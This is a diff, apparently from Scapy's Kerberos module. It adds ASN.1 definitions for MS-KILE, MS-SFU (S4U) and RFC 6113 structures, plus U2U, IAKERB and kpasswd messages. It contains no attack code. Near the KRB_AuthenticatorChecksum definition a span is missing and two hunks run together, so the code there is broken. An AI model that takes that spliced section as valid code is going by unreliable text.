s): cls = _PADATA_CLASSES[pkt.padataType.val] if isinstance(cls, tuple): is_reply = ( - pkt.underlayer.underlayer is not None and - isinstance(pkt.underlayer.underlayer, KRB_ERROR) + pkt.underlayer.underlayer is not None + and isinstance(pkt.underlayer.underlayer, KRB_ERROR) ) or isinstance(pkt.underlayer, (KRB_AS_REP, KRB_TGS_REP)) cls = cls[is_reply] if not val[0].val: @@ -511,49 +753,155 @@ class ETYPE_INFO_ENTRY2(ASN1_Packet): ) -class ETYPE_INFO2(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE_OF("seq", [ETYPE_INFO_ENTRY2()], ETYPE_INFO_ENTRY2) +class ETYPE_INFO2(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF("seq", [ETYPE_INFO_ENTRY2()], ETYPE_INFO_ENTRY2) + + +_PADATA_CLASSES[19] = ETYPE_INFO2 + +# PADATA Extended with RFC6113 + + +class PA_AUTHENTICATION_SET_ELEM(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("paType", 0, explicit_tag=0xA0), + ASN1F_optional( + ASN1F_STRING("paHint", "", explicit_tag=0xA1), + ), + ASN1F_optional( + ASN1F_STRING("paValue", "", explicit_tag=0xA2), + ), + ) + + +class PA_AUTHENTICATION_SET(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF( + "elems", [PA_AUTHENTICATION_SET_ELEM()], PA_AUTHENTICATION_SET_ELEM + ) + + +_PADATA_CLASSES[134] = PA_AUTHENTICATION_SET + + +# [MS-KILE] sect 2.2.3 + + +class PA_PAC_REQUEST(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_BOOLEAN("includePac", True, explicit_tag=0xA0), + ) + + +_PADATA_CLASSES[128] = PA_PAC_REQUEST + + +# [MS-KILE] sect 2.2.5 + + +class LSAP_TOKEN_INFO_INTEGRITY(Packet): + fields_desc = [ + FlagsField( + "Flags", + 0, + -32, + { + 0x00000001: "UAC-Restricted", + }, + ), + LEIntEnumField( + "TokenIL", + 0x00002000, + { + 0x00000000: "Untrusted", + 0x00001000: "Low", + 0x00002000: "Medium", + 0x00003000: "High", + 0x00004000: "System", + 0x00005000: "Protected process", + }, + ), + XStrFixedLenField("MachineID", b"", length=32), + ] + + +# [MS-KILE] sect 2.2.6 + + +class _KerbAdRestrictionEntry_Field(_ASN1FString_PacketField): + def m2i(self, pkt, s): + val = super(_KerbAdRestrictionEntry_Field, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.restrictionType.val == 0x0000: # LSAP_TOKEN_INFO_INTEGRITY + return LSAP_TOKEN_INFO_INTEGRITY(val[0].val, _underlayer=pkt), val[1] + return val + + +class KERB_AD_RESTRICTION_ENTRY(ASN1_Packet): + name = "KERB-AD-RESTRICTION-ENTRY" + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "restrictionType", + 0, + {0: "LSAP_TOKEN_INFO_INTEGRITY"}, + explicit_tag=0xA0, + ), + _KerbAdRestrictionEntry_Field("restriction", b"", explicit_tag=0xA1), + ) + ) + + +_AUTHORIZATIONDATA_VALUES[141] = KERB_AD_RESTRICTION_ENTRY + + +# [MS-KILE] sect 3.2.5.8 -_PADATA_CLASSES[19] = ETYPE_INFO2 +class KERB_AUTH_DATA_AP_OPTIONS(Packet): + name = "KERB-AUTH-DATA-AP-OPTIONS" + fields_desc = [ + LEIntEnumField( + "apOptions", + 0x4000, + { + 0x4000: "KERB_AP_OPTIONS_CBT", + }, + ), + ] -# PADATA Extended with RFC6113 +_AUTHORIZATIONDATA_VALUES[143] = KERB_AUTH_DATA_AP_OPTIONS -class PA_AUTHENTICATION_SET_ELEM(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - Int32("paType", 0, explicit_tag=0xA0), - ASN1F_optional( - ASN1F_STRING("paHint", "", explicit_tag=0xA1), - ), - ASN1F_optional( - ASN1F_STRING("paValue", "", explicit_tag=0xA2), - ), - ) +# This has no doc..? not in [MS-KILE] at least. +# We use the name wireshark/samba gave it -class PA_AUTHENTICATION_SET(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE_OF( - "elems", [PA_AUTHENTICATION_SET_ELEM()], PA_AUTHENTICATION_SET_ELEM - ) + +class KERB_AD_TARGET_PRINCIPAL(Packet): + name = "KERB-AD-TARGET-PRINCIPAL" + fields_desc = [ + StrFieldUtf16("spn", ""), + ] -_PADATA_CLASSES[134] = PA_AUTHENTICATION_SET +_AUTHORIZATIONDATA_VALUES[144] = KERB_AD_TARGET_PRINCIPAL -# [MS-KILE] sect 2.2.3 +# RFC6806 sect 6 -class PA_PAC_REQUEST(ASN1_Packet): + +class KERB_AD_LOGIN_ALIAS(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - ASN1F_BOOLEAN("includePac", True, explicit_tag=0xA0), - ) + ASN1_root = ASN1F_SEQUENCE(ASN1F_SEQUENCE_OF("loginAliases", [], PrincipalName)) -_PADATA_CLASSES[128] = PA_PAC_REQUEST +_AUTHORIZATIONDATA_VALUES[80] = KERB_AD_LOGIN_ALIAS # [MS-KILE] sect 2.2.8 @@ -571,9 +919,9 @@ class PA_SUPPORTED_ENCTYPES(Packet): "RC4-HMAC", "AES128-CTS-HMAC-SHA1-96", "AES256-CTS-HMAC-SHA1-96", - ] + - ["bit_%d" % i for i in range(11)] + - [ + ] + + ["bit_%d" % i for i in range(11)] + + [ "FAST-supported", "Compount-identity-supported", "Claims-supported", @@ -593,11 +941,12 @@ class PA_PAC_OPTIONS(ASN1_Packet): ASN1_root = ASN1F_SEQUENCE( KerberosFlags( "options", - 0, + "", [ "Claims", "Branch-Aware", "Forward-to-Full-DC", + "Resource-based-constrained-delegation", # [MS-SFU] 2.2.5 ], explicit_tag=0xA0, ) @@ -640,7 +989,7 @@ class KrbFastArmoredReq(ASN1_Packet): ASN1F_optional( ASN1F_PACKET("armor", KrbFastArmor(), KrbFastArmor, explicit_tag=0xA0) ), - Checksum(explicit_tag=0xA1), + ASN1F_PACKET("reqChecksum", Checksum(), Checksum, explicit_tag=0xA1), ASN1F_PACKET("encFastReq", None, EncryptedData, explicit_tag=0xA2), ) ) @@ -679,11 +1028,11 @@ class PA_FX_FAST_REPLY(ASN1_Packet): class KrbFastFinished(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - Microseconds("timestamp", 0, explicit_tag=0xA0), - KerberosTime("usec", GeneralizedTime(), explicit_tag=0xA1), + KerberosTime("timestamp", GeneralizedTime(), explicit_tag=0xA0), + Microseconds("usec", 0, explicit_tag=0xA1), Realm("crealm", "", explicit_tag=0xA2), ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA3), - Checksum(explicit_tag=0xA4), + ASN1F_PACKET("ticketChecksum", Checksum(), Checksum, explicit_tag=0xA4), ) @@ -776,6 +1125,63 @@ class PA_PK_AS_REP(ASN1_Packet): _PADATA_CLASSES[17] = PA_PK_AS_REP +# [MS-SFU] + + +# sect 2.2.1 +class PA_FOR_USER(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("userName", PrincipalName(), PrincipalName, explicit_tag=0xA0), + Realm("userRealm", "", explicit_tag=0xA1), + ASN1F_PACKET("cksum", Checksum(), Checksum, explicit_tag=0xA2), + KerberosString("authPackage", "Kerberos", explicit_tag=0xA3), + ) + + +_PADATA_CLASSES[129] = PA_FOR_USER + + +# sect 2.2.2 + + +class S4UUserID(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + UInt32("nonce", 0, explicit_tag=0xA0), + ASN1F_optional( + ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA1), + ), + Realm("crealm", "", explicit_tag=0xA2), + ASN1F_optional( + ASN1F_STRING("subjectCertificate", None, explicit_tag=0xA3), + ), + ASN1F_optional( + ASN1F_FLAGS( + "options", + "", + [ + "reserved", + "KDC_CHECK_LOGON_HOUR_RESTRICTIONS", + "KDC_KEY_USAGE_27", + ], + explicit_tag=0xA4, + ) + ), + ) + + +class PA_S4U_X509_USER(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("userId", S4UUserID(), S4UUserID, explicit_tag=0xA0), + ASN1F_PACKET("checksum", Checksum(), Checksum, explicit_tag=0xA1), + ) + + +_PADATA_CLASSES[130] = PA_S4U_X509_USER + + # Back to RFC4120 # sect 5.10 @@ -788,12 +1194,15 @@ class PA_PK_AS_REP(ASN1_Packet): 12: "TGS-REQ", 13: "TGS-REP", 14: "AP-REQ", + 15: "AP-REP", + 16: "KRB-TGT-REQ", # U2U + 17: "KRB-TGT-REP", # U2U 20: "KRB-SAFE", 21: "KRB-PRIV", 22: "KRB-CRED", 25: "EncASRepPart", 26: "EncTGSRepPart", - 27: "EncApRepPart", + 27: "EncAPRepPart", 28: "EncKrbPrivPart", 29: "EnvKrbCredPart", 30: "KRB-ERROR", @@ -806,14 +1215,20 @@ class KRB_Ticket(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_KRB_APPLICATION( ASN1F_SEQUENCE( - ASN1F_INTEGER("tktVno", 0, explicit_tag=0xA0), + ASN1F_INTEGER("tktVno", 5, explicit_tag=0xA0), Realm("realm", "", explicit_tag=0xA1), - ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xA2), - ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA3), + ASN1F_PACKET("sname", PrincipalName(), PrincipalName, explicit_tag=0xA2), + ASN1F_PACKET("encPart", EncryptedData(), EncryptedData, explicit_tag=0xA3), ), implicit_tag=1, ) + def getSPN(self): + return "%s@%s" % ( + "/".join(x.val.decode() for x in self.sname.nameString), + self.realm.val.decode(), + ) + class TransitedEncoding(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -838,6 +1253,9 @@ class TransitedEncoding(ASN1_Packet): "hw-authent", "transited-since-policy-checked", "ok-as-delegate", + "unused", + "canonicalize", # RFC6806 + "anonymous", # RFC6112 + RFC8129 ] @@ -847,13 +1265,13 @@ class EncTicketPart(ASN1_Packet): ASN1F_SEQUENCE( KerberosFlags( "flags", - 0, + "", _TICKET_FLAGS, explicit_tag=0xA0, ), - ASN1F_PACKET("key", None, EncryptionKey, explicit_tag=0xA1), + ASN1F_PACKET("key", EncryptionKey(), EncryptionKey, explicit_tag=0xA1), Realm("crealm", "", explicit_tag=0xA2), - ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA3), + ASN1F_PACKET("cname", PrincipalName(), PrincipalName, explicit_tag=0xA3), ASN1F_PACKET( "transited", TransitedEncoding(), TransitedEncoding, explicit_tag=0xA4 ), @@ -902,12 +1320,12 @@ class KRB_KDC_REQ_BODY(ASN1_Packet): "opt-hardware-auth", "unused12", "unused13", - "constrained-delegation", - "canonicalize", - "request-anonymous", - ] + - ["unused%d" % i for i in range(17, 26)] + - [ + "cname-in-addl-tkt", # [MS-SFU] sect 2.2.3 + "canonicalize", # RFC6806 + "request-anonymous", # RFC6112 + RFC8129 + ] + + ["unused%d" % i for i in range(17, 26)] + + [ "disable-transited-check", "renewable-ok", "enc-tkt-in-skey", @@ -959,9 +1377,9 @@ class KrbFastReq(ASN1_Packet): [ "RESERVED", "hide-client-names", - ] + - ["res%d" % i for i in range(2, 16)] + - ["kdc-follow-referrals"], + ] + + ["res%d" % i for i in range(2, 16)] + + ["kdc-follow-referrals"], explicit_tag=0xA0, ), ASN1F_SEQUENCE_OF("padata", [PADATA()], PADATA, explicit_tag=0xA1), @@ -983,6 +1401,7 @@ class KRB_TGS_REQ(ASN1_Packet): KRB_KDC_REQ, implicit_tag=12, ) + msgType = ASN1_INTEGER(12) # sect 5.4.2 @@ -1033,7 +1452,7 @@ class LastReqItem(ASN1_Packet): ), KerberosFlags( "flags", - 0, + "", _TICKET_FLAGS, explicit_tag=0xA4, ), @@ -1051,9 +1470,9 @@ class LastReqItem(ASN1_Packet): HostAddresses("caddr", explicit_tag=0xAB), ), # RFC6806 sect 11 - # ASN1F_optional( - ASN1F_SEQUENCE_OF("encryptedPaData", [], PADATA, explicit_tag=0xAC), - # ), + ASN1F_optional( + ASN1F_SEQUENCE_OF("encryptedPaData", [], PADATA, explicit_tag=0xAC), + ), ) @@ -1109,7 +1528,9 @@ class KRB_Authenticator(ASN1_Packet): ASN1F_INTEGER("authenticatorPvno", 5, explicit_tag=0xA0), Realm("crealm", "", explicit_tag=0xA1), ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA2), - ASN1F_optional(Checksum(explicit_tag=0x3)), + ASN1F_optional( + ASN1F_PACKET("cksum", None, Checksum, explicit_tag=0xA3), + ), Microseconds("cusec", 0, explicit_tag=0xA4), KerberosTime("ctime", GeneralizedTime(), explicit_tag=0xA5), ASN1F_optional( @@ -1143,6 +1564,147 @@ class KRB_AP_REP(ASN1_Packet): ) +class EncAPRepPart(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_SEQUENCE( + KerberosTime("ctime", GeneralizedTime(), explicit_tag=0xA0), + Microseconds("cusec", 0, explicit_tag=0xA1), + ASN1F_optional( + ASN1F_PACKET("subkey", None, EncryptionKey, explicit_tag=0xA2), + ), + ASN1F_optional( + UInt32("seqNumber", 0, explicit_tag=0xA3), + ), + ), + implicit_tag=27, + ) + + +# sect 5.7 + + +class KRB_PRIV(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_SEQUENCE( + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 21, KRB_MSG_TYPES, explicit_tag=0xA1), + ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA3), + ), + implicit_tag=21, + ) + + +class EncKrbPrivPart(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_SEQUENCE( + ASN1F_STRING("userData", ASN1_STRING(""), explicit_tag=0xA0), + ASN1F_optional( + KerberosTime("timestamp", None, explicit_tag=0xA1), + ), + ASN1F_optional( + Microseconds("usec", None, explicit_tag=0xA2), + ), + ASN1F_optional( + UInt32("seqNumber", None, explicit_tag=0xA3), + ), + ASN1F_PACKET("sAddress", None, HostAddress, explicit_tag=0xA4), + ASN1F_optional( + ASN1F_PACKET("cAddress", None, HostAddress, explicit_tag=0xA5), + ), + ), + implicit_tag=28, + ) + + +# sect 5.8 + + +class KRB_CRED(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_SEQUENCE( + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 22, KRB_MSG_TYPES, explicit_tag=0xA1), + ASN1F_SEQUENCE_OF("tickets", [KRB_Ticket()], KRB_Ticket, explicit_tag=0xA2), + ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA3), + ), + implicit_tag=22, + ) + + +class KrbCredInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("key", EncryptionKey(), EncryptionKey, explicit_tag=0xA0), + ASN1F_optional( + Realm("prealm", None, explicit_tag=0xA1), + ), + ASN1F_optional( + ASN1F_PACKET("pname", None, PrincipalName, explicit_tag=0xA2), + ), + ASN1F_optional( + KerberosFlags( + "flags", + None, + _TICKET_FLAGS, + explicit_tag=0xA3, + ), + ), + ASN1F_optional( + KerberosTime("authtime", None, explicit_tag=0xA4), + ), + ASN1F_optional(KerberosTime("starttime", None, explicit_tag=0xA5)), + ASN1F_optional( + KerberosTime("endtime", None, explicit_tag=0xA6), + ), + ASN1F_optional( + KerberosTime("renewTill", None, explicit_tag=0xA7), + ), + ASN1F_optional( + Realm("srealm", None, explicit_tag=0xA8), + ), + ASN1F_optional( + ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xA9), + ), + ASN1F_optional( + HostAddresses("caddr", explicit_tag=0xAA), + ), + ) + + +class EncKrbCredPart(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_SEQUENCE( + ASN1F_SEQUENCE_OF( + "ticketInfo", + [KrbCredInfo()], + KrbCredInfo, + explicit_tag=0xA0, + ), + ASN1F_optional( + UInt32("nonce", None, explicit_tag=0xA1), + ), + ASN1F_optional( + KerberosTime("timestamp", None, explicit_tag=0xA2), + ), + ASN1F_optional( + Microseconds("usec", None, explicit_tag=0xA3), + ), + ASN1F_optional( + ASN1F_PACKET("sAddress", None, HostAddress, explicit_tag=0xA4), + ), + ASN1F_optional( + ASN1F_PACKET("cAddress", None, HostAddress, explicit_tag=0xA5), + ), + ), + implicit_tag=29, + ) + + # sect 5.9.1 @@ -1156,10 +1718,18 @@ def m2i(self, pkt, s): val = super(_KRBERROR_data_Field, self).m2i(pkt, s) if not val[0].val: return val - if pkt.errorCode.val in [24, 25]: + if pkt.errorCode.val in [14, 24, 25]: + # 14: KDC_ERR_ETYPE_NOSUPP # 24: KDC_ERR_PREAUTH_FAILED # 25: KDC_ERR_PREAUTH_REQUIRED return MethodData(val[0].val, _underlayer=pkt), val[1] + elif pkt.errorCode.val in [41, 60]: + # 41: KRB_AP_ERR_MODIFIED + # 60: KRB_ERR_GENERIC + return KERB_ERROR_DATA(val[0].val, _underlayer=pkt), val[1] + elif pkt.errorCode.val == 69: + # KRB_AP_ERR_USER_TO_USER_REQUIRED + return KRB_TGT_REP(val[0].val, _underlayer=pkt), val[1] return val @@ -1170,10 +1740,10 @@ class KRB_ERROR(ASN1_Packet): ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), ASN1F_enum_INTEGER("msgType", 30, KRB_MSG_TYPES, explicit_tag=0xA1), ASN1F_optional( - KerberosTime("ctime", GeneralizedTime(), explicit_tag=0xA2), + KerberosTime("ctime", None, explicit_tag=0xA2), ), ASN1F_optional( - Microseconds("cusec", 0, explicit_tag=0xA3), + Microseconds("cusec", None, explicit_tag=0xA3), ), KerberosTime("stime", GeneralizedTime(), explicit_tag=0xA4), Microseconds("susec", 0, explicit_tag=0xA5), @@ -1250,35 +1820,202 @@ class KRB_ERROR(ASN1_Packet): 74: "KDC_ERR_REVOCATION_STATUS_UNAVAILABLE", 75: "KDC_ERR_CLIENT_NAME_MISMATCH", 76: "KDC_ERR_KDC_NAME_MISMATCH", + # draft-ietf-kitten-iakerb + 85: "KRB_AP_ERR_IAKERB_KDC_NOT_FOUND", + 86: "KRB_AP_ERR_IAKERB_KDC_NO_RESPONSE", + # RFC6113 + 90: "KDC_ERR_PREAUTH_EXPIRED", + 91: "KDC_ERR_MORE_PREAUTH_DATA_REQUIRED", + 92: "KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET", + 93: "KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS", }, explicit_tag=0xA6, ), - ASN1F_optional(Realm("crealm", "", explicit_tag=0xA7)), + ASN1F_optional(Realm("crealm", None, explicit_tag=0xA7)), ASN1F_optional( ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA8), ), - Realm("realm", "", explicit_tag=0xA9), - ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xAA), - ASN1F_optional(KerberosString("eText", "", explicit_tag=0xAB)), - ASN1F_optional(_KRBERROR_data_Field("eData", "", explicit_tag=0xAC)), + Realm("realm", "", explicit_tag=0xA9), + ASN1F_PACKET("sname", PrincipalName(), PrincipalName, explicit_tag=0xAA), + ASN1F_optional(KerberosString("eText", "", explicit_tag=0xAB)), + ASN1F_optional(_KRBERROR_data_Field("eData", "", explicit_tag=0xAC)), + ), + implicit_tag=30, + ) + + +# [MS-KILE] sect 2.2.1 + + +class KERB_EXT_ERROR(Packet): + fields_desc = [ + XLEIntField("status", 0), + XLEIntField("reserved", 0), + XLEIntField("flags", 0x00000001), + ] + + +# [MS-KILE] sect 2.2.2 + + +class _Error_Field(_ASN1FString_PacketField): + def m2i(self, pkt, s): + val = super(_Error_Field, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.dataType.val == 3: # KERB_ERR_TYPE_EXTENDED + print(val[0].val) + return KERB_EXT_ERROR(val[0].val, _underlayer=pkt), val[1] + return val + + +class KERB_ERROR_DATA(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "dataType", + 2, + { + 1: "KERB_AP_ERR_TYPE_NTSTATUS", # from the wdk + 2: "KERB_AP_ERR_TYPE_SKEW_RECOVERY", + 3: "KERB_ERR_TYPE_EXTENDED", + }, + explicit_tag=0xA1, + ), + ASN1F_optional(_Error_Field("dataValue", None, explicit_tag=0xA2)), + ) + + +# Kerberos U2U - draft-ietf-cat-user2user-03 + + +class KRB_TGT_REQ(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 16, KRB_MSG_TYPES, explicit_tag=0xA1), + ASN1F_optional( + ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xA2), + ), + ASN1F_optional( + Realm("realm", None, explicit_tag=0xA3), + ), + ) + + +class KRB_TGT_REP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 17, KRB_MSG_TYPES, explicit_tag=0xA1), + ASN1F_PACKET("ticket", None, KRB_Ticket, explicit_tag=0xA2), + ) + + +# RFC 6542 sect 4 + + +class KRB_FINISHED(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_PACKET("gssMic", Checksum(), Checksum, explicit_tag=0xA1), + ) + + +# RFC 6542 sect 3.1 + + +class KRB_GSS_EXT(Packet): + fields_desc = [ + IntEnumField( + "type", + 0, + { + # https://www.iana.org/assignments/kerberos-v-gss-api/kerberos-v-gss-api.xhtml + 0x00000000: "GSS_EXTS_CHANNEL_BINDING", # RFC 6542 sect 3.2 + 0x00000001: "GSS_EXTS_IAKERB_FINISHED", # not standard + 0x00000002: "GSS_EXTS_FINISHED", # PKU2U / IAKERB + }, + ), + FieldLenField("length", None, length_of="data", fmt="!I"), + MultipleTypeField( + [ + ( + PacketField("data", KRB_FINISHED(), KRB_FINISHED), + lambda pkt: pkt.type == 0x00000002, + ), + ], + XStrLenField("data", b"", length_from=lambda pkt: pkt.length), + ), + ] + + +# RFC 4121 sect 4.1.1 + + +class KRB_AuthenticatorChecksum(Packet): + fields_desc = [ + FieldLenField("Lgth", None, length_of="Bnd", fmt="= 2: - if _pkt[:2] == b"\x01\x01": - return KRB5_GSS_GetMIC_RFC1964 - elif _pkt[:2] == b"\x02\x01": - return KRB5_GSS_Wrap_RFC1964 - elif _pkt[:2] == b"\x01\x02": - return KRB5_GSS_Delete_sec_context_RFC1964 - elif _pkt[:2] in [b"\x01\x00", "\x02\x00", "\x03\x00"]: - return KRB5_InitialContextToken_innerContextToken - elif _pkt[:2] == b"\x04\x04": - return KRB5_GSS_GetMIC - elif _pkt[:2] == b"\x05\x04": - return KRB5_GSS_Wrap - return KRB5_GSS_Wrap +# Kerberos IAKERB - draft-ietf-kitten-iakerb-03 + + +class IAKERB_HEADER(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Realm("targetRealm", "", explicit_tag=0xA1), + ASN1F_optional( + ASN1F_STRING("cookie", None, explicit_tag=0xA2), + ), + ) + + +_InitialContextTokens[b"\x05\x01"] = IAKERB_HEADER + + +# Register for GSSAPI + +# Kerberos 5 +_GSSAPI_OIDS["1.2.840.113554.1.2.2"] = KRB_InnerToken +_GSSAPI_SIGNATURE_OIDS["1.2.840.113554.1.2.2"] = KRB_InnerToken +# Kerberos 5 - U2U +_GSSAPI_OIDS["1.2.840.113554.1.2.2.3"] = KRB_InnerToken +# Kerberos 5 - IAKERB +_GSSAPI_OIDS["1.3.6.1.5.2.5"] = KRB_InnerToken # Entry class @@ -1450,7 +2208,8 @@ class Kerberos(ASN1_Packet): ASN1_root = ASN1F_CHOICE( "root", None, - KRB_InitialContextToken, # [APPLICATION 0] + # RFC4120 + KRB_GSSAPI_Token, # [APPLICATION 0] KRB_Ticket, # [APPLICATION 1] KRB_Authenticator, # [APPLICATION 2] KRB_AS_REQ, # [APPLICATION 10] @@ -1459,6 +2218,7 @@ class Kerberos(ASN1_Packet): KRB_TGS_REP, # [APPLICATION 13] KRB_AP_REQ, # [APPLICATION 14] KRB_AP_REP, # [APPLICATION 15] + # RFC4120 KRB_ERROR, # [APPLICATION 30] ) @@ -1470,16 +2230,22 @@ def mysummary(self): bind_bottom_up(UDP, Kerberos, dport=88) bind_layers(UDP, Kerberos, sport=88, dport=88) -bind_layers(KRB5_InitialContextToken_innerContextToken, Kerberos) -bind_layers(KRB5_GSS_GetMIC_RFC1964, Kerberos) -bind_layers(KRB5_GSS_Wrap_RFC1964, Kerberos) -bind_layers(KRB5_GSS_Wrap_RFC1964, Kerberos) +_InitialContextTokens[b"\x01\x00"] = KRB_AP_REQ +_InitialContextTokens[b"\x02\x00"] = KRB_AP_REP +_InitialContextTokens[b"\x03\x00"] = KRB_ERROR +_InitialContextTokens[b"\x04\x00"] = KRB_TGT_REQ +_InitialContextTokens[b"\x04\x01"] = KRB_TGT_REP + +bind_layers(KRB_InnerToken, Kerberos) # RFC4120 sect 7.2.2 class KerberosTCPHeader(Packet): + # According to RFC 5021, first bit to 1 has a special meaning and + # negotiates Kerberos TCP extensions... But apart from rfc6251 no one used that + # https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml#kerberos-parameters-4 fields_desc = [LenField("len", None, fmt="!I")] @classmethod @@ -1497,133 +2263,482 @@ def tcp_reassemble(cls, data, *args, **kwargs): bind_layers(TCP, KerberosTCPHeader, dport=88) +# RFC3244 sect 2 + + +class KPASSWD_REQ(Packet): + fields_desc = [ + ShortField("len", None), + ShortField("pvno", 0xFF80), + ShortField("apreqlen", None), + PacketLenField( + "apreq", KRB_AP_REQ(), KRB_AP_REQ, length_from=lambda pkt: pkt.apreqlen + ), + ConditionalField( + PacketLenField( + "krbpriv", + KRB_PRIV(), + KRB_PRIV, + length_from=lambda pkt: pkt.len - 6 - pkt.apreqlen, + ), + lambda pkt: pkt.apreqlen != 0, + ), + ConditionalField( + PacketLenField( + "error", KRB_ERROR(), KRB_ERROR, length_from=lambda pkt: pkt.len - 6 + ), + lambda pkt: pkt.apreqlen == 0, + ), + ] + + def post_build(self, p, pay): + if self.len is None: + p = struct.pack("!H", len(p)) + p[2:] + if self.apreqlen is None and self.krbpriv is not None: + p = p[:4] + struct.pack("!H", len(self.apreq)) + p[6:] + return p + pay + + +class ChangePasswdData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_STRING("newpasswd", ASN1_STRING(""), explicit_tag=0xA0), + ASN1F_optional( + ASN1F_PACKET("targname", None, PrincipalName, explicit_tag=0xA1) + ), + ASN1F_optional(Realm("targrealm", None, explicit_tag=0xA2)), + ) + + +class KPASSWD_REP(Packet): + fields_desc = [ + ShortField("len", None), + ShortField("pvno", 0x0001), + ShortField("apreplen", None), + PacketLenField( + "aprep", KRB_AP_REP(), KRB_AP_REP, length_from=lambda pkt: pkt.apreplen + ), + ConditionalField( + PacketLenField( + "krbpriv", + KRB_PRIV(), + KRB_PRIV, + length_from=lambda pkt: pkt.len - 6 - pkt.apreplen, + ), + lambda pkt: pkt.apreplen != 0, + ), + ConditionalField( + PacketLenField( + "error", KRB_ERROR(), KRB_ERROR, length_from=lambda pkt: pkt.len - 6 + ), + lambda pkt: pkt.apreplen == 0, + ), + ] + + def post_build(self, p, pay): + if self.len is None: + p = struct.pack("!H", len(p)) + p[2:] + if self.apreplen is None and self.krbpriv is not None: + p = p[:4] + struct.pack("!H", len(self.aprep)) + p[6:] + return p + pay + + def answers(self, other): + return isinstance(other, KPASSWD_REQ) + + +KPASSWD_RESULTS = { + 0: "KRB5_KPASSWD_SUCCESS", + 1: "KRB5_KPASSWD_MALFORMED", + 2: "KRB5_KPASSWD_HARDERROR", + 3: "KRB5_KPASSWD_AUTHERROR", + 4: "KRB5_KPASSWD_SOFTERROR", + 5: "KRB5_KPASSWD_ACCESSDENIED", + 6: "KRB5_KPASSWD_BAD_VERSION", + 7: "KRB5_KPASSWD_INITIAL_FLAG_NEEDED", +} + + +class KPasswdRepData(Packet): + fields_desc = [ + ShortEnumField("resultCode", 0, KPASSWD_RESULTS), + StrField("resultString", ""), + ] + + +class Kpasswd(Packet): + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 4: + if _pkt[2:4] == b"\xff\x80": + return KPASSWD_REQ + elif _pkt[2:4] == b"\x00\x01": + asn1_tag = BER_id_dec(_pkt[6:8])[0] & 0x1F + if asn1_tag 